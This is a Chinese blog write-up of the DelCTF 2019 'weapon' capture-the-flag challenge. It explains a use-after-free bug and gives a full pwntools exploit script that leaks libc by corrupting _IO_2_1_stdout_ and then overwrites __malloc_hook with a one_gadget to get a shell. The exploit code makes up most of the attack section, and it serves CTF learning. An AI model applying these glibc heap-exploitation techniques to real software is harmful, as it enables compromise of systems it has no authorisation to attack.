DelCTF2019 weapon WP

最新推荐文章于 2020-11-15 13:56:23 发布
最新推荐文章于 2020-11-15 13:56:23 发布
阅读量353 收藏
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: DelCTF2019
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/102239655
版权

保护

在这里插入图片描述

分析

  • 程序一共只有三个操作:增、删、改。又是没有泄露,看来又是利用IO_FILE泄露内存了。
  • 漏洞还是很明显的,在删除操作中没有将free掉的指针置NULL
    在这里插入图片描述
  • 并且编辑的时候没有检测指针的合法性,因此形成了UAF
    在这里插入图片描述
  • 在添加操作中限制了分配的大小在这里插入图片描述

利用

  • 程序中多处存在scanf函数,根据前面的文章可以知道,scanf可以帮我们得到一块unsortbinchunk,我们构造的攻击链如下:
    1.申请4个chunk,释放其中的两个,然后利用scanf的特性得到一个unsortbin chunk。
    2.释放剩余两个fastbin chunk,利用UAF修改其FD指向unsortbin chunk中。
    3.利用UAF修改unsortbin的低16位,利用fastbin attack有几率得到stdout附近的地址。
    4.部分修改stdout,泄露内存。
    5.利用fastbin attack精确攻击到malloc_hook,修改为one_gadget

EXP

from pwn import*
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
def Add(size,name,idx):
    p.sendlineafter('>> ','1')
    p.sendlineafter(': ',str(size))
    p.sendlineafter(': ',str(idx))
    p.sendlineafter(':',name)

def Edit(idx,name):
    p.sendlineafter('>> ','3')
    p.sendlineafter(': ',str(idx))
    p.sendafter(':',name)
def Del(idx):
    p.sendlineafter('>> ','2')
    p.sendlineafter(':',str(idx))

while True:
    try:
        p=process('./weapon',aslr=True)
        proc_base=p.libs()[os.path.abspath(os.path.join(os.getcwd(), './weapon'))]
        Add(0x60,'\x11'*8,0)
        Add(0x50,'\x22'*8,1)
        Add(0x60,'\x33'*8,2)
        Add(0x60,'\x33'*8,3)
        Del(1)
        Del(2)
        p.sendlineafter('>> ','4'*0x500)
        Add(0x10,'',1)
        '''gdb.attach(p,'x/10gx '+str(0x202060+proc_base)+'\n heap bins')
        pause()'''
        Add(0x60,'',1)
        Del(3)
        Del(0)
        Edit(0,'\x00')
        '''gdb.attach(p,'x/10gx '+str(0x202060+proc_base)+'\n heap bins')
        pause()'''
        Add(0x60,'',1)
        Edit(2,'\0'*0x28+p64(0x71)+p16(0x95dd))
        Add(0x60,'',1)
        Add(0x60,'',1)
        Edit(1,'\0'*0x33+p32(0xfbad1880)+'hack'+'\0'*0x18+'\x88')
        p.recv(8)
        libc_base=u64(p.recv(8))-libc.sym['_IO_2_1_stdin_']
        malloc_hook=libc.sym['__malloc_hook']+libc_base
        one=[0x45206,0x4525a,0xef9f4,0xf0897]
        success('libc_base:'+hex(libc_base))
        Del(0)
        Edit(0,p64(malloc_hook-0x23)+'\n')
        Add(0x60,'',1)
        Add(0x60,'\0'*0x13+p64(one[3]+libc_base),1)#
        p.sendlineafter('>> ','1')
        p.sendlineafter(': ','8')
        p.sendlineafter(': ','0')
        p.interactive()
        raw_input()
        exit(0)
    except EOFError,e:
        p.close()

总结

  • IO_FILE的利用逐渐变为常态,需熟练掌握。
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1018
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
de1ctf_2019_weapon
doudoudedi
05-06 699
这题我多了一个换行搞了老久了服了还是tcl 思路 有uaf通过写IO来得到libc地址然后通过double free来拿到shell exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./de1ctf_2019_weapon') p=remote('node3.buuoj.cn',292...
DelCTF2019 Cplusplus WP
qq_41252520的博客
10-03 681
前言 错过了这场比赛,赛后补上。虽有WP可以参考,但是复现起来还是磕磕绊绊。我总不想去依赖wp,于是先自己去分析,一开始好多看不懂的代码,睡过去了,积极性受打击,遂搁置了一天。断断续续逆了3天,然后参考WP,终于弄懂了。 分析 程序无壳,用IDA分析。主要过程分为三步,每一步就是flag的一个组成部分。通过单步调试,可以知道flag的第一部分与第二部分用 @ 做分割,第二部分与第三部分用 #...
De1CTF weapon 经验总结
qq_43189757的博客
10-04 737
第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下 1.泄露libc 由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址 具体步骤: 1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chun...
Weapon System
04-09
AssetsStore :Weapon System
basic weapon system.unitypackage
01-17
HTC Vive VR游戏开发实战教程里用到的插件,官网没了,这里下载。
JavaLikeCommunityBoard_PowerBuilder_Weapon_
09-28
testing files for naebal etot tupoy site i skachal extender
cf中的weapon
04-21
cf中的weapon供大家使用,大家尽管下载吧
Pocket RPG Weapon Trails
05-28
该插件在剑痕的制作过程中用的比较多!如果可用的话就下载吧!
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1121
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
Weapon
weixin_30612769的博客
09-05 188
Weapon Time Limit: 1000 msMemory Limit: 32768 KB In World War 3, your countries' scientists have invented a special weapon. Assume that the enemy's city can be described by rectangular coordi...
de1ctf 部分writeup解析
zhang14916的博客
05-09 1765
1.NLFSR: 在ctf-wiki中我们可以找到一种对NLFDSR的攻击方法——https://wiki.x10sec.org/crypto/streamcipher/fsr/nfsr/。由于对多个LFSR组合时不能实现均匀混合吗,我们可以发现有的值和最后结果相近,我们可以据此对NLFSR中的部分LFSR进行爆破。最后我们可以对剩下的LFSR进行爆破。首先我们可以根据多个LFSR组合判断哪些LF...
mulheap WP
qq_41252520的博客
09-17 139
前言 这题我当时在比赛的时候只停留于表象,结果被骗了,没有看出来漏洞,也没做出来,太亏了。结束后看到别人的题解,才发现还真是“水题”。 保护 分析 程序使用 LLVM 编译的,开了控制流。但是根据字符串的提示,还是很容易找到各个操作对应的函数,影响不是很大。 习惯性的只看反汇编代码,竟发现没有漏洞!!!而删除操作,貌似没有真的释放。 那怎么搞?后来才知道是 LLVM 把真相给掩藏起来了,...
CTF之图片隐写
热门推荐
龙乐的专栏
08-15 6万+
图片隐写1:chal.png,图片如下: 题目图片即为一张白板,用Stegsolve.jar工具打开,向右疯狂点箭头得到flag: 题目2:Here.png: 直接拖到kali里用binwalk -e Here.png得到释放出的文件夹中有flag.txt,打开即得到flag。   题目3:flag.png: 这个是LSB隐写: 首先用Stegsolve.jar打...
上海大学生网络安全赛lgtwo
chennbnbnb的博客
11-15 304
程序分析 思路 有一个offset-by-one,但是题目没libc,应该只会是2.27与2.23 先尝试按照2.27的来试试 #! /usr/bin/python from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') #sh = process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so.6') sh = remo...
后台登录(实验吧CTF题库-WEB)
MyCyber
05-20 3923
后台登录(实验吧CTF题库-WEB) 题目概述 分值:10 难度:易参 解题通过率:94% 格式:flag:{xxx} 题目链接:http://www.shiyanbar.com/ctf/2036 参考解题步骤 1、首先,我们先查看一下网页源码,发现其中有以下注释内容 $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE u...
180515 逆向-被隐藏的真实(DDCTF_Re3)
whklhhhh的博客
05-15 1343
这题本来单纯地以为是很简单的题,听欧佳俊师傅讲了一下出题思路才发现他的想法真的比答题人多得多…… main函数里调用了三次get_pwd()这个函数来check输入 get_pwd中接受输入,然后对count自增,调用了Bitcoin对象的一个函数来校验输入 如果熟悉C++逆向的话,一眼就能看出来这是在调用虚函数 因为v2是对象的空间,在C++的对象构造中,开头4个字节指向的是虚函...
ext文件系统机制原理剖析
Biao
04-05 2151
将磁盘进行分区,分区是将磁盘按柱面进行物理上的划分。划分好分区后还要进行格式化,然后再挂载才能使用(不考虑其他方法)。格式化分区的过程其实就是创建文件系统。 文件系统的类型有很多种,如CentOS 5和CentOS 6上默认使用的ext2/ext3/ext4,CentOS 7上默认使用的xfs,windows上的NTFS,光盘类的文件系统ISO9660,MAC上的混合文件系统HFS,网络文件系统.........
定义一个接口weapon定义一个类army
最新发布
03-28
interface Weapon { void attack(); } class Army { private Weapon weapon; public Army(Weapon weapon) { this.weapon = weapon; } public void setWeapon(Weapon weapon) { this.weapon = weapon; } ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值